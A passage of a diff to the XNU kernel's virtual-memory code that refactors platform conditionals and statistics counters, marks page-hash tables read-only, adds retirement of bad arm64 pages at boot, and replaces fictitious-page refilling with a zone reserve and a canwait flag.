+                       counter_inc(&vm_statistics_pageouts);
                        DTRACE_VM2(pgout, int, 1, (uint64_t *), NULL);
 
                        dwp->dw_mask |= DW_enqueue_cleaned;
@@ -9672,7 +9652,7 @@ return_err:
                vm_page_unlock_queues();
 
                if (need_unwire == TRUE) {
-                       VM_STAT_INCR(reactivations);
+                       counter_inc(&vm_statistics_reactivations);
                }
        }
 #if UPL_DEBUG
index 980095f6f9c53f734646082224b5f3cf96a9a7a4..94e667ca4fa7bcdf222a3fb89438cb814d68e550 100644 (file)
@@ -227,7 +227,11 @@ extern upl_size_t upl_get_size(
 extern upl_t upl_associated_upl(upl_t upl);
 extern void upl_set_associated_upl(upl_t upl, upl_t associated_upl);
 
+#ifndef MACH_KERNEL_PRIVATE
+typedef struct vm_page  *vm_page_t;
+#endif
 #ifdef  XNU_KERNEL_PRIVATE
+#include <vm/vm_kern.h>
 
 extern upl_size_t upl_adjusted_size(
        upl_t upl,
@@ -252,22 +256,18 @@ extern void iopl_valid_data(
        upl_t                   upl_ptr,
        vm_tag_t        tag);
 
-#endif  /* XNU_KERNEL_PRIVATE */
-
-extern struct vnode * upl_lookup_vnode(upl_t upl);
-
-#ifndef MACH_KERNEL_PRIVATE
-typedef struct vm_page  *vm_page_t;
-#endif
-
-extern void                vm_page_free_list(
+extern void               vm_page_free_list(
        vm_page_t   mem,
        boolean_t   prepare_object);
 
 extern kern_return_t      vm_page_alloc_list(
        int         page_count,
-       int                 flags,
-       vm_page_t * list);
+       kma_flags_t flags,
+       vm_page_t  *list);
+
+#endif  /* XNU_KERNEL_PRIVATE */
+
+extern struct vnode * upl_lookup_vnode(upl_t upl);
 
 extern void               vm_page_set_offset(vm_page_t page, vm_object_offset_t offset);
 extern vm_object_offset_t vm_page_get_offset(vm_page_t page);
@@ -276,9 +276,9 @@ extern vm_page_t          vm_page_get_next(vm_page_t page);
 
 extern kern_return_t    mach_vm_pressure_level_monitor(boolean_t wait_for_pressure, unsigned int *pressure_level);
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 extern kern_return_t    vm_pageout_wait(uint64_t deadline);
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
 #ifdef  MACH_KERNEL_PRIVATE
 
index 01e0711b3ca10cfd3611420f1b4c069f2f546661..c0a74a04f153bd10cf4d2f160bc96633d114b7b1 100644 (file)
 
 uint32_t phantom_cache_eval_period_in_msecs = 250;
 uint32_t phantom_cache_thrashing_threshold_ssd = 1000;
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 uint32_t phantom_cache_thrashing_threshold = 500;
-#else
+#else /* !XNU_TARGET_OS_OSX */
 uint32_t phantom_cache_thrashing_threshold = 50;
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 
 /*
  * Number of consecutive thrashing periods required before
  * vm_phantom_cache_check_pressure() returns true.
  */
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 unsigned phantom_cache_contiguous_periods = 4;
-#else
+#else /* !XNU_TARGET_OS_OSX */
 unsigned phantom_cache_contiguous_periods = 2;
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 
 clock_sec_t     pc_start_of_eval_period_sec = 0;
 clock_nsec_t    pc_start_of_eval_period_nsec = 0;
@@ -113,11 +113,11 @@ vm_phantom_cache_init()
        if (!VM_CONFIG_COMPRESSOR_IS_ACTIVE) {
                return;
        }
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
        num_entries = (uint32_t)(((max_mem / PAGE_SIZE) / 10) / VM_GHOST_PAGES_PER_ENTRY);
-#else
+#else /* !XNU_TARGET_OS_OSX */
        num_entries = (uint32_t)(((max_mem / PAGE_SIZE) / 4) / VM_GHOST_PAGES_PER_ENTRY);
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
        vm_phantom_cache_num_entries = 1;
 
        while (vm_phantom_cache_num_entries < num_entries) {
index 50a654348f40b6943e3557ea0dd19c046cf33966..78b5a746d5eecc5de487119ec9be4a07d6b16df2 100644 (file)
@@ -71,8 +71,13 @@ extern boolean_t vm_swap_files_pinned(void);
 extern mach_port_name_t ipc_port_copyout_send(
        ipc_port_t      sright,
        ipc_space_t     space);
+extern mach_port_name_t ipc_port_copyout_send_pinned(
+       ipc_port_t      sright,
+       ipc_space_t     space);
 extern task_t port_name_to_task(
        mach_port_name_t name);
+extern task_t port_name_to_task_read(
+       mach_port_name_t name);
 extern task_t port_name_to_task_name(
        mach_port_name_t name);
 extern void ipc_port_release_send(
@@ -96,6 +101,7 @@ extern void consider_machine_adjust(void);
 extern vm_map_offset_t get_map_min(vm_map_t);
 extern vm_map_offset_t get_map_max(vm_map_t);
 extern vm_map_size_t get_vmmap_size(vm_map_t);
+extern int get_task_page_size(task_t);
 #if CONFIG_COREDUMP
 extern int get_vmmap_entries(vm_map_t);
 #endif
@@ -178,7 +184,8 @@ extern memory_object_t apple_protect_pager_setup(
        vm_object_offset_t      crypto_backing_offset,
        struct pager_crypt_info *crypt_info,
        vm_object_offset_t      crypto_start,
-       vm_object_offset_t      crypto_end);
+       vm_object_offset_t      crypto_end,
+       boolean_t               cache_pager);
 #endif  /* CONFIG_CODE_DECRYPTION */
 
 struct vm_shared_region_slide_info;
@@ -590,6 +597,20 @@ extern unsigned int mach_vm_ctl_page_free_wanted(void);
 
 extern int no_paging_space_action(void);
 
+/*
+ * counts updated by revalidate_text_page()
+ */
+extern unsigned int vmtc_total;        /* total # of text page corruptions detected */
+extern unsigned int vmtc_undiagnosed;  /* of that what wasn't diagnosed */
+extern unsigned int vmtc_not_eligible; /* failed to correct, due to page attributes */
+extern unsigned int vmtc_copyin_fail;  /* of undiagnosed, copyin failure count */
+extern unsigned int vmtc_not_found;    /* of diagnosed, no error found - code signing error? */
+extern unsigned int vmtc_one_bit_flip; /* of diagnosed, single bit errors */
+#define MAX_TRACK_POWER2 9             /* of diagnosed, counts of 1, 2, 4,... bytes corrupted */
+extern unsigned int vmtc_byte_counts[MAX_TRACK_POWER2 + 1];
+
+extern kern_return_t revalidate_text_page(task_t, vm_map_offset_t);
+
 #define VM_TOGGLE_CLEAR         0
 #define VM_TOGGLE_SET           1
 #define VM_TOGGLE_GETVALUE      999
index b44ec0cf8dd2e056dca8dcf920d94cf328b79d03..08355b9e543a3d027351c9c9b5e025fb540a0cda 100644 (file)
@@ -736,13 +736,13 @@ vm_purgeable_object_find_and_lock(
                 */
                owner = object->vo_owner;
                if (owner != NULL && owner != VM_OBJECT_OWNER_DISOWNED) {
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #if CONFIG_JETSAM
                        object_task_importance = proc_get_memstat_priority((struct proc *)get_bsdtask_info(owner), TRUE);
 #endif /* CONFIG_JETSAM */
-#else /* CONFIG_EMBEDDED */
+#else /* !XNU_TARGET_OS_OSX */
                        object_task_importance = task_importance_estimate(owner);
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
                }
 
                if (object_task_importance < best_object_task_importance) {
index ca78ec877f4cdd5dd48b7d5b6498c5ef11382fcb..0cb0914af16ab1203fe11bec4fafaf5698a59f2b 100644 (file)
@@ -70,7 +70,7 @@
 #include <mach/vm_prot.h>
 #include <mach/vm_statistics.h>
 #include <mach/sdt.h>
-#include <kern/counters.h>
+#include <kern/counter.h>
 #include <kern/host_statistics.h>
 #include <kern/sched_prim.h>
 #include <kern/policy_internal.h>
@@ -169,11 +169,13 @@ boolean_t       hibernation_vmqueues_inspection = FALSE; /* Tracks if the hibern
                                                           * Updated and checked behind the vm_page_queues_lock. */
 
 static void             vm_page_free_prepare(vm_page_t  page);
-static vm_page_t        vm_page_grab_fictitious_common(ppnum_t phys_addr);
+static vm_page_t        vm_page_grab_fictitious_common(ppnum_t, boolean_t);
 
 static void vm_tag_init(void);
 
 /* for debugging purposes */
+SECURITY_READ_ONLY_EARLY(uint32_t) vm_packed_from_vm_pages_array_mask =
+    VM_PAGE_PACKED_FROM_ARRAY;
 SECURITY_READ_ONLY_EARLY(vm_packing_params_t) vm_page_packing_params =
     VM_PACKING_PARAMS(VM_PAGE_PACKED_PTR);
 
@@ -211,12 +213,12 @@ typedef struct {
 
 #define BUCKETS_PER_LOCK        16
 
-vm_page_bucket_t *vm_page_buckets;              /* Array of buckets */
-unsigned int    vm_page_bucket_count = 0;       /* How big is array? */
-unsigned int    vm_page_hash_mask;              /* Mask for hash function */
-unsigned int    vm_page_hash_shift;             /* Shift for hash function */
-uint32_t        vm_page_bucket_hash;            /* Basic bucket hash */
-unsigned int    vm_page_bucket_lock_count = 0;          /* How big is array of locks? */
+SECURITY_READ_ONLY_LATE(vm_page_bucket_t *) vm_page_buckets;                /* Array of buckets */
+SECURITY_READ_ONLY_LATE(unsigned int)       vm_page_bucket_count = 0;       /* How big is array? */
+SECURITY_READ_ONLY_LATE(unsigned int)       vm_page_hash_mask;              /* Mask for hash function */
+SECURITY_READ_ONLY_LATE(unsigned int)       vm_page_hash_shift;             /* Shift for hash function */
+SECURITY_READ_ONLY_LATE(uint32_t)           vm_page_bucket_hash;            /* Basic bucket hash */
+SECURITY_READ_ONLY_LATE(unsigned int)       vm_page_bucket_lock_count = 0;  /* How big is array of locks? */
 
 #ifndef VM_TAG_ACTIVE_UPDATE
 #error VM_TAG_ACTIVE_UPDATE
@@ -225,13 +227,14 @@ unsigned int    vm_page_bucket_lock_count = 0;          /* How big is array of l
 #error VM_MAX_TAG_ZONES
 #endif
 
-boolean_t   vm_tag_active_update = VM_TAG_ACTIVE_UPDATE;
-lck_spin_t      *vm_page_bucket_locks;
+/* for debugging */
+SECURITY_READ_ONLY_LATE(bool) vm_tag_active_update = VM_TAG_ACTIVE_UPDATE;
+SECURITY_READ_ONLY_LATE(lck_spin_t *) vm_page_bucket_locks;
 
 vm_allocation_site_t            vm_allocation_sites_static[VM_KERN_MEMORY_FIRST_DYNAMIC + 1];
 vm_allocation_site_t *          vm_allocation_sites[VM_MAX_TAG_VALUE];
 #if VM_MAX_TAG_ZONES
-vm_allocation_zone_total_t **   vm_allocation_zone_totals;
+static vm_allocation_zone_total_t **vm_allocation_zone_totals;
 #endif /* VM_MAX_TAG_ZONES */
 
 vm_tag_t vm_allocation_tag_highest;
@@ -244,8 +247,6 @@ vm_map_offset_t vm_page_fake_buckets_start, vm_page_fake_buckets_end;
 #endif /* VM_PAGE_FAKE_BUCKETS */
 #endif /* VM_PAGE_BUCKETS_CHECK */
 
-
-
 #if     MACH_PAGE_HASH_STATS
 /* This routine is only for debug.  It is intended to be called by
  * hand by a developer using a kernel debugger.  This routine prints
@@ -353,7 +354,6 @@ LCK_GRP_DECLARE(vm_page_lck_grp_local, "vm_page_queue_local");
 LCK_GRP_DECLARE(vm_page_lck_grp_purge, "vm_page_purge");
 LCK_GRP_DECLARE(vm_page_lck_grp_alloc, "vm_page_alloc");
 LCK_GRP_DECLARE(vm_page_lck_grp_bucket, "vm_page_bucket");
-LCK_MTX_EARLY_DECLARE_ATTR(vm_page_alloc_lock, &vm_page_lck_grp_alloc, &vm_page_lck_attr);
 LCK_SPIN_DECLARE_ATTR(vm_objects_wired_lock, &vm_page_lck_grp_bucket, &vm_page_lck_attr);
 LCK_SPIN_DECLARE_ATTR(vm_allocation_sites_lock, &vm_page_lck_grp_bucket, &vm_page_lck_attr);
 
@@ -1331,6 +1331,24 @@ pmap_steal_freeable_memory(
        return pmap_steal_memory_internal(size, TRUE);
 }
 
+#if defined(__arm64__)
+/*
+ * Retire a page at startup.
+ * These pages will eventually wind up on the retired_pages_object
+ * in vm_retire_boot_pages().
+ */
+static vm_page_queue_head_t vm_page_queue_retired VM_PAGE_PACKED_ALIGNED;
+static void
+vm_page_retire_startup(vm_page_t p)
+{
+       p->vmp_q_state = VM_PAGE_NOT_ON_Q;
+       p->vmp_error = true;
+       p->vmp_unusual = true;
+       vm_page_queue_enter(&vm_page_queue_retired, p, vmp_pageq);
+       printf("To be retired at boot: page at 0x%llx\n", (long long)ptoa(VM_PAGE_GET_PHYS_PAGE(p)));
+}
+#endif /* defined(__arm64__) */
+
 #if CONFIG_SECLUDED_MEMORY
 /* boot-args to control secluded memory */
 unsigned int secluded_mem_mb = 0;       /* # of MBs of RAM to seclude */
@@ -1382,8 +1400,15 @@ pmap_startup(
         * the memory needed to map what's being allocated, i.e. the page
         * table entries. So the actual number of pages we get will be
         * less than this. To do someday: include that in the computation.
+        *
+        * Also for ARM, we don't use the count of free_pages, but rather the
+        * range from last page to first page (ignore holes due to retired pages).
         */
+#if defined(__arm__) || defined(__arm64__)
+       mem_sz = pmap_free_pages_span() * (uint64_t)PAGE_SIZE;
+#else /* defined(__arm__) || defined(__arm64__) */
        mem_sz = pmap_free_pages() * (uint64_t)PAGE_SIZE;
+#endif /* defined(__arm__) || defined(__arm64__) */
        mem_sz += round_page(virtual_space_start) - virtual_space_start;        /* Account for any slop */
        npages = (uint_t)(mem_sz / (PAGE_SIZE + sizeof(*vm_pages)));    /* scaled to include the vm_page_ts */
 
@@ -1509,6 +1534,9 @@ pmap_startup(
 #endif
 
        vm_delayed_count = 0;
+#if defined(__arm64__)
+       vm_page_queue_init(&vm_page_queue_retired);
+#endif /* defined(__arm64__) */
 
        absolutetime_to_nanoseconds(mach_absolute_time(), &start_ns);
        vm_pages_count = 0;
@@ -1533,9 +1561,24 @@ pmap_startup(
                        vm_first_phys_ppnum = phys_page;
                        patch_low_glo_vm_page_info((void *)vm_page_array_beginning_addr,
                            (void *)vm_page_array_ending_addr, vm_first_phys_ppnum);
+#if defined(__arm64__)
+               } else {
+                       /*
+                        * pmap_next_page() may skip over pages reported bad by iboot.
+                        */
+                       while (i < phys_page - vm_first_phys_ppnum && i < npages) {
+                               ++vm_pages_count;
+                               vm_page_init(&vm_pages[i], i + vm_first_phys_ppnum, FALSE);
+                               vm_page_retire_startup(&vm_pages[i]);
+                               ++i;
+                       }
+                       if (i >= npages) {
+                               break;
+                       }
+                       assert(i == phys_page - vm_first_phys_ppnum);
+#endif /* defined(__arm64__) */
                }
-               assert((i + vm_first_phys_ppnum) == phys_page);
-#endif
+#endif /* defined(__arm__) || defined(__arm64__) */
 
 #if defined(__x86_64__)
                /* The x86 clump freeing code requires increasing ppn's to work correctly */
@@ -1556,7 +1599,9 @@ pmap_startup(
 
        if (!vm_himemory_mode) {
                do {
-                       vm_page_release_startup(&vm_pages[--i]);
+                       if (!vm_pages[--i].vmp_error) {               /* skip retired pages */
+                               vm_page_release_startup(&vm_pages[i]);
+                       }
                } while (i != 0);
        }
 
@@ -1603,13 +1648,15 @@ vm_page_module_init_delayed(void)
                 * Reflect size and usage information for vm_pages[].
                 */
 
-               z->countavail = (uint32_t)(vm_page_array_ending_addr - vm_pages);
-               z->countfree = z->countavail - vm_pages_count;
+               z->z_elems_avail = (uint32_t)(vm_page_array_ending_addr - vm_pages);
+               z->z_elems_free = z->z_elems_avail - vm_pages_count;
                zpercpu_get_cpu(z->z_stats, 0)->zs_mem_allocated =
                vm_pages_count * sizeof(struct vm_page);
                vm_page_array_zone_data_size = (uintptr_t)((void *)vm_page_array_ending_addr - (void *)vm_pages);
                vm_page_zone_pages = atop(round_page((vm_offset_t)vm_page_array_zone_data_size));
-               z->page_count += vm_page_zone_pages;
+               z->z_wired_cur += vm_page_zone_pages;
+               z->z_wired_hwm = z->z_wired_cur;
+               z->z_va_cur = z->z_wired_cur;
                /* since zone accounts for these, take them out of stolen */
                VM_PAGE_MOVE_STOLEN(vm_page_zone_pages);
        });
@@ -1636,12 +1683,23 @@ vm_page_module_init(void)
            ~(VM_PAGE_PACKED_PTR_ALIGNMENT - 1);
 
        vm_page_zone = zone_create_ext("vm pages", vm_page_with_ppnum_size,
-           ZC_ALLOW_FOREIGN | ZC_NOGZALLOC | ZC_ALIGNMENT_REQUIRED |
-           ZC_NOCALLOUT, ZONE_ID_ANY, ^(zone_t z) {
+           ZC_NOGZALLOC | ZC_ALIGNMENT_REQUIRED, ZONE_ID_ANY, ^(zone_t z) {
 #if defined(__LP64__)
-               zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED_MAP);
+               zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED);
 #endif
-               zone_set_exhaustible(z, 0);
+               /*
+                * The number "10" is a small number that is larger than the number
+                * of fictitious pages that any single caller will attempt to allocate
+                * without blocking.
+                *
+                * The largest such number at the moment is kernel_memory_allocate()
+                * when 2 guard pages are asked for. 10 is simply a somewhat larger number,
+                * taking into account the 50% hysteresis the zone allocator uses.
+                *
+                * Note: this works at all because the zone allocator
+                *       doesn't ever allocate fictitious pages.
+                */
+               z->z_elems_rsv = 10;
        });
 }
 STARTUP(ZALLOC, STARTUP_RANK_SECOND, vm_page_module_init);
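
With vm_page_more_fictitious() removed further below, callers rely on the per-zone reserve configured above plus the new canwait argument; a minimal caller sketch (error handling abbreviated):

    vm_page_t p;

    p = vm_page_grab_fictitious(TRUE);     /* Z_WAITOK: may block until the zone refills */

    p = vm_page_grab_fictitious(FALSE);    /* Z_NOWAIT: may return VM_PAGE_NULL */
    if (p == VM_PAGE_NULL) {
        /* caller must handle the shortage, e.g. retry after vm_page_wait() */
    }
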
@@ -1666,11 +1724,7 @@ vm_page_create(
        for (phys_page = start;
            phys_page < end;
            phys_page++) {
-               while ((m = (vm_page_t) vm_page_grab_fictitious_common(phys_page))
-                   == VM_PAGE_NULL) {
-                       vm_page_more_fictitious();
-               }
-
+               m = vm_page_grab_fictitious_common(phys_page, TRUE);
                m->vmp_fictitious = FALSE;
                pmap_clear_noencrypt(phys_page);
 
@@ -1681,6 +1735,38 @@ vm_page_create(
        }
 }
 
+#if defined(__arm64__)
+/*
+ * Like vm_page_create(), except we want to immediately retire the page,
+ * not put it on the free list.
+ */
+void
+vm_page_create_retired(
+       ppnum_t   phys_page)
+{
+       vm_page_t m;
+
+       m = vm_page_grab_fictitious_common(phys_page, TRUE);
+       m->vmp_fictitious = FALSE;
+       pmap_clear_noencrypt(phys_page);
+       m->vmp_error = true;
+       m->vmp_unusual = true;
+       vm_page_lock_queues();
+       m->vmp_q_state = VM_PAGE_IS_WIRED;
+       m->vmp_wire_count++;
+       vm_page_unlock_queues();
+
+       lck_mtx_lock(&vm_page_queue_free_lock);
+       vm_page_pages++;
+       lck_mtx_unlock(&vm_page_queue_free_lock);
+
+       vm_object_lock(retired_pages_object);
+       vm_page_insert_wired(m, retired_pages_object, ptoa(VM_PAGE_GET_PHYS_PAGE(m)), VM_KERN_MEMORY_RETIRED);
+       vm_object_unlock(retired_pages_object);
+       pmap_retire_page(VM_PAGE_GET_PHYS_PAGE(m));
+}
+#endif /* defined(__arm64__) */
+
 /*
  *     vm_page_hash:
  *
@@ -2621,43 +2707,34 @@ vm_page_init(
  *     Remove a fictitious page from the free list.
  *     Returns VM_PAGE_NULL if there are no free pages.
  */
-int     c_vm_page_grab_fictitious = 0;
-int     c_vm_page_grab_fictitious_failed = 0;
-int     c_vm_page_release_fictitious = 0;
-int     c_vm_page_more_fictitious = 0;
 
-vm_page_t
-vm_page_grab_fictitious_common(
-       ppnum_t phys_addr)
+static vm_page_t
+vm_page_grab_fictitious_common(ppnum_t phys_addr, boolean_t canwait)
 {
-       vm_page_t       m;
+       vm_page_t m;
 
-       if ((m = (vm_page_t)zalloc_noblock(vm_page_zone))) {
+       m = zalloc_flags(vm_page_zone, canwait ? Z_WAITOK : Z_NOWAIT);
+       if (m) {
                vm_page_init(m, phys_addr, FALSE);
                m->vmp_fictitious = TRUE;
-
-               c_vm_page_grab_fictitious++;
-       } else {
-               c_vm_page_grab_fictitious_failed++;
        }
-
        return m;
 }
 
 vm_page_t
-vm_page_grab_fictitious(void)
+vm_page_grab_fictitious(boolean_t canwait)
 {
-       return vm_page_grab_fictitious_common(vm_page_fictitious_addr);
+       return vm_page_grab_fictitious_common(vm_page_fictitious_addr, canwait);
 }
 
 int vm_guard_count;
 
 
 vm_page_t
-vm_page_grab_guard(void)
+vm_page_grab_guard(boolean_t canwait)
 {
        vm_page_t page;
-       page = vm_page_grab_fictitious_common(vm_page_guard_addr);
+       page = vm_page_grab_fictitious_common(vm_page_guard_addr, canwait);
        if (page) {
                OSAddAtomic(1, &vm_guard_count);
        }
@@ -2684,91 +2761,9 @@ vm_page_release_fictitious(
                OSAddAtomic(-1, &vm_guard_count);
        }
 
-       c_vm_page_release_fictitious++;
-
        zfree(vm_page_zone, m);
 }
 
-/*
- *     vm_page_more_fictitious:
- *
- *     Add more fictitious pages to the zone.
- *     Allowed to block. This routine is way intimate
- *     with the zones code, for several reasons:
- *     1. we need to carve some page structures out of physical
- *        memory before zones work, so they _cannot_ come from
- *        the zone restricted submap.
- *     2. the zone needs to be collectable in order to prevent
- *        growth without bound. These structures are used by
- *        the device pager (by the hundreds and thousands), as
- *        private pages for pageout, and as blocking pages for
- *        pagein. Temporary bursts in demand should not result in
- *        permanent allocation of a resource.
- *     3. To smooth allocation humps, we allocate single pages
- *        with kernel_memory_allocate(), and cram them into the
- *        zone.
- */
-
-void
-vm_page_more_fictitious(void)
-{
-       vm_offset_t     addr;
-       kern_return_t   retval;
-
-       c_vm_page_more_fictitious++;
-
-       /*
-        * Allocate a single page from the zone restricted submap. Do not wait
-        * if no physical pages are immediately available, and do not zero the
-        * space. We need our own blocking lock here to prevent having multiple,
-        * simultaneous requests from piling up on the zone restricted submap
-        * lock.
-        * Exactly one (of our) threads should be potentially waiting on the map
-        * lock.  If winner is not vm-privileged, then the page allocation will
-        * fail, and it will temporarily block here in the vm_page_wait().
-        */
-       lck_mtx_lock(&vm_page_alloc_lock);
-       /*
-        * If another thread allocated space, just bail out now.
-        */
-       if (os_atomic_load(&vm_page_zone->countfree, relaxed) > 5) {
-               /*
-                * The number "5" is a small number that is larger than the
-                * number of fictitious pages that any single caller will
-                * attempt to allocate. Otherwise, a thread will attempt to
-                * acquire a fictitious page (vm_page_grab_fictitious), fail,
-                * release all of the resources and locks already acquired,
-                * and then call this routine. This routine finds the pages
-                * that the caller released, so fails to allocate new space.
-                * The process repeats infinitely. The largest known number
-                * of fictitious pages required in this manner is 2. 5 is
-                * simply a somewhat larger number.
-                */
-               lck_mtx_unlock(&vm_page_alloc_lock);
-               return;
-       }
-
-       retval = kernel_memory_allocate(zone_submap(vm_page_zone),
-           &addr, PAGE_SIZE, 0, KMA_ZERO | KMA_KOBJECT | KMA_NOPAGEWAIT,
-           VM_KERN_MEMORY_ZONE);
-
-       if (retval != KERN_SUCCESS) {
-               /*
-                * No page was available. Drop the
-                * lock to give another thread a chance at it, and
-                * wait for the pageout daemon to make progress.
-                */
-               lck_mtx_unlock(&vm_page_alloc_lock);
-               vm_page_wait(THREAD_UNINT);
-               return;
-       }
-
-       zcram(vm_page_zone, addr, PAGE_SIZE);
-
-       lck_mtx_unlock(&vm_page_alloc_lock);
-}
-
-
 /*
  *     vm_pool_low():
  *
@@ -2776,7 +2771,7 @@ vm_page_more_fictitious(void)
  *     can get memory without blocking.  Advisory only, since the
  *     situation may change under us.
  */
-int
+bool
 vm_pool_low(void)
 {
        /* No locking, at worst we will fib. */
@@ -3053,15 +3048,12 @@ vm_page_grablo(void)
 
        VM_PAGE_ZERO_PAGEQ_ENTRY(mem);
 
-       disable_preemption();
-       *PERCPU_GET(vm_page_grab_count) += 1;
+       counter_inc(&vm_page_grab_count);
        VM_DEBUG_EVENT(vm_page_grab, VM_PAGE_GRAB, DBG_FUNC_NONE, 0, 1, 0, 0);
-       enable_preemption();
 
        return mem;
 }
 
-
 /*
  *     vm_page_grab:
  *
@@ -3121,7 +3113,7 @@ return_page_from_cpu_list:
                vm_page_grab_diags();
 
                vm_offset_t pcpu_base = current_percpu_base();
-               *PERCPU_GET_WITH_BASE(pcpu_base, vm_page_grab_count) += 1;
+               counter_inc_preemption_disabled(&vm_page_grab_count);
                *PERCPU_GET_WITH_BASE(pcpu_base, free_pages) = mem->vmp_snext;
                VM_DEBUG_EVENT(vm_page_grab, VM_PAGE_GRAB, DBG_FUNC_NONE, grab_options, 0, 0, 0);
 
@@ -3201,11 +3193,9 @@ return_page_from_cpu_list:
                        if (mem) {
                                VM_CHECK_MEMORYSTATUS;
 
-                               disable_preemption();
                                vm_page_grab_diags();
-                               *PERCPU_GET(vm_page_grab_count) += 1;
+                               counter_inc(&vm_page_grab_count);
                                VM_DEBUG_EVENT(vm_page_grab, VM_PAGE_GRAB, DBG_FUNC_NONE, grab_options, 0, 0, 0);
-                               enable_preemption();
 
                                return mem;
                        }
@@ -3333,7 +3323,7 @@ return_page_from_cpu_list:
                 * satisfy this request
                 */
                vm_page_grab_diags();
-               *PERCPU_GET_WITH_BASE(pcpu_base, vm_page_grab_count) += 1;
+               counter_inc_preemption_disabled(&vm_page_grab_count);
                VM_DEBUG_EVENT(vm_page_grab, VM_PAGE_GRAB, DBG_FUNC_NONE, grab_options, 0, 0, 0);
                mem = head;
                assert(mem->vmp_q_state == VM_PAGE_ON_FREE_LOCAL_Q);
@@ -3891,8 +3881,6 @@ vm_page_wait(
                 * context switch. Could be a perf. issue.
                 */
 
-               counter(c_vm_page_wait_block++);
-
                if (need_wakeup) {
                        thread_wakeup((event_t)&vm_page_free_wanted);
                }
@@ -3921,7 +3909,6 @@ vm_page_wait(
                wait_result = assert_wait(wait_event, interruptible);
 
                lck_mtx_unlock(&vm_page_queue_free_lock);
-               counter(c_vm_page_wait_block++);
 
                if (need_wakeup) {
                        thread_wakeup((event_t)&vm_page_free_wanted);
@@ -3980,35 +3967,6 @@ vm_page_alloc(
        return mem;
 }
 
-/*
- *     vm_page_alloc_guard:
- *
- *      Allocate a fictitious page which will be used
- *     as a guard page.  The page will be inserted into
- *     the object and returned to the caller.
- */
-
-vm_page_t
-vm_page_alloc_guard(
-       vm_object_t             object,
-       vm_object_offset_t      offset)
-{
-       vm_page_t       mem;
-
-       vm_object_lock_assert_exclusive(object);
-       mem = vm_page_grab_guard();
-       if (mem == VM_PAGE_NULL) {
-               return VM_PAGE_NULL;
-       }
-
-       vm_page_insert(mem, object, offset);
-
-       return mem;
-}
-
-
-counter(unsigned int c_laundry_pages_freed = 0; )
-
 /*
  *     vm_page_free_prepare:
  *
@@ -4051,7 +4009,6 @@ vm_page_free_prepare_queues(
                 * from its pageout queue and adjust the laundry accounting
                 */
                vm_pageout_steal_laundry(mem, TRUE);
-               counter(++c_laundry_pages_freed);
        }
 
        vm_page_queues_remove(mem, TRUE);
@@ -5806,7 +5763,8 @@ vm_page_find_contiguous(
        unsigned int    idx_last_contig_page_found = 0;
        int             free_considered = 0, free_available = 0;
        int             substitute_needed = 0;
-       boolean_t       wrapped, zone_gc_called = FALSE;
+       int             zone_gc_called = 0;
+       boolean_t       wrapped;
        kern_return_t   kr;
 #if DEBUG
        clock_sec_t     tv_start_sec = 0, tv_end_sec = 0;
@@ -6445,7 +6403,7 @@ done_scanning:
 #if MACH_ASSERT
        vm_page_verify_free_lists();
 #endif
-       if (m == NULL && zone_gc_called == FALSE) {
+       if (m == NULL && zone_gc_called < 2) {
                printf("%s(num=%d,low=%d): found %d pages at 0x%llx...scanned %d pages...  yielded %d times...  dumped run %d times... stole %d pages... stole %d compressed pages... wired count is %d\n",
                    __func__, contig_pages, max_pnum, npages, (vm_object_offset_t)start_pnum << PAGE_SHIFT,
                        scanned, yielded, dumped_run, stolen_pages, compressed_pages, vm_page_wire_count);
@@ -6454,9 +6412,9 @@ done_scanning:
                        (void)(*consider_buffer_cache_collect)(1);
                }
 
-               consider_zone_gc(FALSE);
+               zone_gc(zone_gc_called ? ZONE_GC_DRAIN : ZONE_GC_TRIM);
 
-               zone_gc_called = TRUE;
+               zone_gc_called++;
 
                printf("vm_page_find_contiguous: zone_gc called... wired count is %d\n", vm_page_wire_count);
                goto full_scan_again;
@@ -6704,36 +6662,76 @@ vm_page_do_delayed_work(
 
 kern_return_t
 vm_page_alloc_list(
-       int     page_count,
-       int     flags,
-       vm_page_t *list)
+       int         page_count,
+       kma_flags_t flags,
+       vm_page_t  *list)
 {
-       vm_page_t       lo_page_list = VM_PAGE_NULL;
+       vm_page_t       page_list = VM_PAGE_NULL;
        vm_page_t       mem;
-       int             i;
+       kern_return_t   kr = KERN_SUCCESS;
+       int             page_grab_count = 0;
+       mach_vm_size_t  map_size = ptoa_64(page_count);
+#if DEVELOPMENT || DEBUG
+       task_t          task = current_task();
+#endif /* DEVELOPMENT || DEBUG */
 
-       if (!(flags & KMA_LOMEM)) {
-               panic("vm_page_alloc_list: called w/o KMA_LOMEM");
-       }
+       for (int i = 0; i < page_count; i++) {
+               for (;;) {
+                       if (flags & KMA_LOMEM) {
+                               mem = vm_page_grablo();
+                       } else {
+                               mem = vm_page_grab();
+                       }
 
-       for (i = 0; i < page_count; i++) {
-               mem = vm_page_grablo();
+                       if (mem != VM_PAGE_NULL) {
+                               break;
+                       }
 
-               if (mem == VM_PAGE_NULL) {
-                       if (lo_page_list) {
-                               vm_page_free_list(lo_page_list, FALSE);
+                       if (flags & KMA_NOPAGEWAIT) {
+                               kr = KERN_RESOURCE_SHORTAGE;
+                               goto out;
+                       }
+                       if ((flags & KMA_LOMEM) && (vm_lopage_needed == TRUE)) {
+                               kr = KERN_RESOURCE_SHORTAGE;
+                               goto out;
                        }
 
-                       *list = VM_PAGE_NULL;
+                       /* VM privileged threads should have waited in vm_page_grab() and not get here. */
+                       assert(!(current_thread()->options & TH_OPT_VMPRIV));
 
-                       return KERN_RESOURCE_SHORTAGE;
+                       uint64_t unavailable = (vm_page_wire_count + vm_page_free_target) * PAGE_SIZE;
+                       if (unavailable > max_mem || map_size > (max_mem - unavailable)) {
+                               kr = KERN_RESOURCE_SHORTAGE;
+                               goto out;
+                       }
+                       VM_PAGE_WAIT();
                }
